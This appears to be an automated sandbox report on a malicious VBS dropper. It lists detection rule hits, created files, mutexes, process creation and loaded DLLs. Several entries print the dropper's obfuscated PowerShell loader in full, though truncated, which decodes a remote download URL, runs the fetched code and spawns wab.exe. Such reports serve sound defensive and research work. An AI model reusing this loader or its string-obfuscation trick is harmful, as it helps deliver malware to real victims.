              Source: amsi64_7308.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7588.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7308, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7588, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@12/7@4/4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Briarberry.Mil
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\HS0J0ha2f3izEQny
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izhnjtxg.3t0.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\windows.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7308
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7588
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. 
';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
